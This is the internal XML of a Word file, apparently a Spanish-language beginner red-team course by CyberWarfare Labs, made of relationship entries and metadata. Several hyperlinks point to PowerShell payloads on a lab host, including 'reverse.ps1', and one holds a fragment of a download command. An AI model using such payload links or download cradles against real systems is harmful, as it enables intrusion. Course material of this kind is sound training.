Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer37.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.jpeg"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.2.2/file.ps1" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><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1.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer24.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer38.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.jpeg"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/company/cyberwarfare/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer27.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.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image" Target="media/image6.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.2.2/file.ps1" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.jpeg"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.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0.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.jpeg"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer39.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.jpeg"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/cyberwarfarelab" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.jpe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hyperlink" Target="http://192.168.2.2/file.ps1%27%2C%24false)%3B%24file.sen" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer45.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpeg"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.jpeg"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpeg"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberwarfare.live/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://excellmedia.dl.sourceforge.net/project/metasploitable/Metasploitable2/metasploitable-linux-2.0.0.zip" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.jpe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hyperlink" Target="http://192.168.2.2/file.ps1%27%2C%24false)%3B%24file.sen" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer46.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer20.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1"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attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cyberwarfare.live/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer28.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><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hyperlink" Target="http://192.168.2.2/reverse.ps1" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer40.xml"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.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footer" Target="footer25.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpe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footer" Target="footer17.xml"/><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61.jpeg"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer22.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpe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1.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.2.2/reverse.ps1" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer41.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.jpeg"/><Relationship Id="rId127"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6.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer32.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2.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.jpeg"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer47.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.jpeg"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cyberwarfare.live" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.jpeg"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer43.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052"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2.cs.fsu.edu/~bogdanov/SysAdminSp05/Agenda/week07/ad1.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ww2.cs.fsu.edu/~bogdanov/SysAdminSp05/Agenda/week07/ad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2F52-0C5C-4B08-B71A-C79A4B06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492</Words>
  <Characters>46707</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>389</Lines>
  <Paragraphs>110</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5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 ROJO PARA PRINCIPIANTES: MATERIAL DEL CURSO</dc:title>
  <dc:creator>yash bharadwaj</dc:creator>
  <cp:lastModifiedBy>Wilmer Xavier Camas Mainato</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-05T13:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-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PowerPoint® 2016</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2025-03-05T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>3-Heights(TM) PDF Security Shell 4.8.25.2 (http://www.pdf-tools.com)</vt:lpwstr>
  </property>
</Properties>
</file>